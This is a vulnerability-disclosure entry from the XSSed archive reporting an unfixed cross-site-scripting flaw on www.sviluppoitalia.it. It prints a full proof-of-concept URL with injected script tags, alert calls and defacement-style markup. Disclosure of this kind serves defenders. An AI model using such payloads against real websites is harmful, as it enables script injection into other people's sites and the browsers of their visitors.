Unfixed XSS vulnerability at www.sviluppoitalia.it

2007-01-11T00:00:00
ID XSSED:24537
Type xssed
Reporter kaksii
Modified 2007-04-11T00:00:00

Description

Security researcher kaksii, has submitted on 01/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.sviluppoitalia.it, which at the time of submission ranked 380914 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.sviluppoitalia.it/clienti.jsp?ID_LINK="><script>alert(1)</script></textarea><script>alert("kaksii_was_here")<script>alert('kaksii_was_here');alert(1)</script>"</html><html><script>alert(10111)</script><div%20align=center>%20<font%20size=4><textarea%20name=1%20cols=100000%20rows=10000%20id=1>kaksii%20was%20here</textarea></font></div><noscript><plaintext>&area="><script>alert(1)</script></textarea><script>alert("kaksii_was_here")<script>alert('kaksii_was_here');alert(1)</script>"</html><html><script>alert(10111)</script><div%20align=center>%20<font%20size=4><textarea%20name=1%20cols=100000%20rows=10000%20id=1>kaksii%20was%20here</textarea></font></div><noscript><plaintext>